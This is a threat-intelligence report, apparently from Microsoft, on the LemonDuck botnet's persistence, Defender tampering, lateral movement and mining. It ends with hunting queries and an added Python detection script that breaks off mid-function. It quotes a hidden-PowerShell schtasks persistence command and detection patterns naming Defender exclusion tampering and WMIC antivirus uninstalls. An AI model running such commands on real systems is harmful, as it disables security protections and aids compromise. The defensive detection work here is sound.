We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as opposed to self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also take action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nAt the basic end of implementation, this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To counter these kinds of behaviors, it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names.\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this could lead to a situation where, because a system no longer appears to be unpatched, suspicious activity that occurred before patching is ignored or assumed to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, and so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days' worth of raw data to inspect events in your network and locate potential LemonDuck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, and select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines, present from 2020 to 2021, used by dropped scripts that attach malicious LemonDuck samples to emails and mail them to the contacts of mailboxes on impacted machines. Additionally, checks whether attachments are present in the message. General attachment types to check for at present are .DOC, .ZIP or .JS, though these could change, as could the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with the name \u201cSIEX\u201d, which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of observed LemonDuck keyword variations in commands initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where _WMIC.exe_ is used to query installed products by name and call their uninstall method non-interactively, targeting products associated with Kaspersky, Avast, ESET or Norton Security, or whose names contain \u201cSecurity\u201d or \u201cAntiVirus\u201d. Because LemonDuck attempts these uninstalls regardless of what is installed, custom alerts on uninstall attempts against products that are not deployed in the environment can quickly surface affected devices. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts, such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware, as well as the mining components and potential secondary functions. Options for more specific instances are included to account for environments with potential false positives. The most general version is intended to account for minor script or component changes, such as switching to non-.bin files or uncommon components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks (such as blackball, blutea, or rtsa) or follows a semi-unique task-creation pattern: LemonDuck also launches hidden PowerShell processes from tasks with randomly generated names. An example of a randomly generated one is: \"schtasks.exe\" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr \"powershell -w hidden -c PS_CMD\" (where PS_CMD stands in for the PowerShell payload). 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") and DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. 
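The Defender-tampering, LemonDuck scheduled-task and competition-killer hunting queries above, re-implemented over process-creation events in plain Python for a pipeline that cannot run KQL. This is an added example, not code from the Microsoft blog: the `has` helper only approximates KQL term matching, the event records in `SAMPLE_EVENTS` are constructed for the demo, and the random task name in them is made up.

```python
"""Added example (not code from the Microsoft blog): three of the LemonDuck
hunting queries re-expressed over process-creation events. SAMPLE_EVENTS is
constructed telemetry, not data from the blog."""
import re
from collections import defaultdict


def has(text, phrase):
    """Approximate KQL `has`: case-insensitive, and where the phrase begins or
    ends with a term character it must sit on a term boundary, so "/F" matches
    "...ZV/F /tr" but "ok" does not match "Outlook"."""
    pattern = re.escape(phrase)
    if re.match(r"[A-Za-z0-9_]", phrase):
        pattern = r"(?<![A-Za-z0-9_])" + pattern
    if re.search(r"[A-Za-z0-9_]$", phrase):
        pattern += r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def has_all(text, phrases):
    return all(has(text, p) for p in phrases)


def has_any(text, phrases):
    return any(has(text, p) for p in phrases)


# Rule 1: parent process disables real-time monitoring or adds exclusions.
DEFENDER_TERMS = ("Set-MpPreference", "DisableRealtimeMonitoring",
                  "Add-MpPreference", "ExclusionProcess")


def defender_tampering(events):
    return [e for e in events
            if has_all(e["InitiatingProcessCommandLine"], DEFENDER_TERMS)]


# Rule 2: schtasks /create with a known static name, or the hidden-PowerShell
# pattern. The blog's query keeps the literal placeholder PS_CMD; replace it
# with the payload string you actually observe before deploying this.
STATIC_TASK_NAMES = ("/tn blackball", "/tn blutea", "/tn rtsa")
HIDDEN_PS_PATTERN = ("/create", "/ru", "system", "/sc", "/mo", "/tn", "/F", "/tr",
                     "powershell -w hidden -c PS_CMD")


def lemonduck_task_creation(events):
    hits = []
    for e in events:
        cl = e["ProcessCommandLine"]
        if e["FileName"].lower() != "schtasks.exe" or not has(cl, "/create"):
            continue
        if has_any(cl, STATIC_TASK_NAMES) or has_all(cl, HIDDEN_PS_PATTERN):
            hits.append(e)
    return hits


# Rule 3: the KR.bin killer deletes dozens of competitor tasks in one burst.
KILLER_TASK_NAMES = ("Mysa", "Sorry", "Oracle Java Update", "ok")


def competition_killer(events, low=40, high=80):
    """Equivalent of `summarize make_set(ProcessCommandLine) by DeviceId` plus
    the DeleteVolume bounds; returns {DeviceId: number of distinct deletes}."""
    per_device = defaultdict(set)
    for e in events:
        cl = e["ProcessCommandLine"]
        if has_all(cl, ("schtasks.exe", "/Delete", "/TN", "/F")):
            per_device[e["DeviceId"]].add(cl)
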